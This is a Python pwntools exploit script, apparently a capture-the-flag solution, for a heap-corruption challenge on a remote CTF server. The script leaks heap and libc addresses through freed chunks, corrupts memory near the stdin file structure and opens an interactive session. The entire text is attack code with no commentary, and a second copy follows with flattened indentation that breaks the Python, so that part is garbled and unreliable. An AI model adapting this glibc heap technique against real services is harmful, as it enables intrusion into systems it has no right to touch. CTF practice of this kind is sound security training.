hkraw/hiv_expl.py

## hiv_expl.py
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random

#Utils
def create(type,number):
	io.sendlineafter('>> ','1')
	io.sendlineafter('> ',f'{type}')
	io.sendlineafter(': ',f'{number}')

def delete(type):
	io.sendlineafter('>> ','2')
	io.sendlineafter('> ',f'{type}')

def show(type):
	io.sendlineafter('>> ','3')
	io.sendlineafter('> ',f'{type}')
	return io.recvline().strip()

#Global
INT = 1
SHORT = 2

#Addr
unsorted_bin_offset = 0x3ebca0
_IO_2_1_stdin_ = 0x3eba00

#Exploit
if __name__ == '__main__':
#	io = process('./hiv')
	io = remote('pwn.game.alcapwnctf.in',31233)

	create(INT,0x61616161)
	delete(INT)
	create(SHORT,0x61)
	delete(INT)
	for i in xrange(5):
		create(SHORT,0x61)
		delete(INT)
	heap_last_bytes = int(show(INT).split(b':')[1],0)
	print(hex(heap_last_bytes))
	for i in xrange(2):
		create(INT,heap_last_bytes)
		delete(SHORT)
	create(SHORT,heap_last_bytes-0x10)
	create(SHORT,0x61)
	create(SHORT,0x91)
	delete(INT)

	for i in xrange(7):
		create(SHORT,0x0)
		delete(INT)
	unsorted_bin_last_bytes = int(show(INT).split(b':')[1],0)
	libc_base_last_bytes = unsorted_bin_last_bytes - unsorted_bin_offset
	print(hex(libc_base_last_bytes&0xffffffff))

	create(SHORT,unsorted_bin_last_bytes&0xffff)
	delete(SHORT)
	create(INT,0x0)
	create(INT,libc_base_last_bytes+_IO_2_1_stdin_+(14*8))
	create(SHORT,0x0)
	create(SHORT,0x0)

	create(INT,0x0)
	delete(INT)
	create(SHORT,0x0)
	delete(INT)
	create(INT,heap_last_bytes+0x20)
	create(INT,0x0)
	create(INT,0x0)

	create(INT,666)
	io.sendlineafter('>> ','4')
	io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from past.builtins import xrange
	from time import sleep
	import random

	#Utils
	def create(type,number):
	io.sendlineafter('>> ','1')
	io.sendlineafter('> ',f'{type}')
	io.sendlineafter(': ',f'{number}')

	def delete(type):
	io.sendlineafter('>> ','2')
	io.sendlineafter('> ',f'{type}')

	def show(type):
	io.sendlineafter('>> ','3')
	io.sendlineafter('> ',f'{type}')
	return io.recvline().strip()

	#Global
	INT = 1
	SHORT = 2

	#Addr
	unsorted_bin_offset = 0x3ebca0
	_IO_2_1_stdin_ = 0x3eba00

	#Exploit
	if __name__ == '__main__':
	# io = process('./hiv')
	io = remote('pwn.game.alcapwnctf.in',31233)

	create(INT,0x61616161)
	delete(INT)
	create(SHORT,0x61)
	delete(INT)
	for i in xrange(5):
	create(SHORT,0x61)
	delete(INT)
	heap_last_bytes = int(show(INT).split(b':')[1],0)
	print(hex(heap_last_bytes))
	for i in xrange(2):
	create(INT,heap_last_bytes)
	delete(SHORT)
	create(SHORT,heap_last_bytes-0x10)
	create(SHORT,0x61)
	create(SHORT,0x91)
	delete(INT)

	for i in xrange(7):
	create(SHORT,0x0)
	delete(INT)
	unsorted_bin_last_bytes = int(show(INT).split(b':')[1],0)
	libc_base_last_bytes = unsorted_bin_last_bytes - unsorted_bin_offset
	print(hex(libc_base_last_bytes&0xffffffff))

	create(SHORT,unsorted_bin_last_bytes&0xffff)
	delete(SHORT)
	create(INT,0x0)
	create(INT,libc_base_last_bytes+_IO_2_1_stdin_+(14*8))
	create(SHORT,0x0)
	create(SHORT,0x0)

	create(INT,0x0)
	delete(INT)
	create(SHORT,0x0)
	delete(INT)
	create(INT,heap_last_bytes+0x20)
	create(INT,0x0)
	create(INT,0x0)

	create(INT,666)
	io.sendlineafter('>> ','4')
	io.interactive()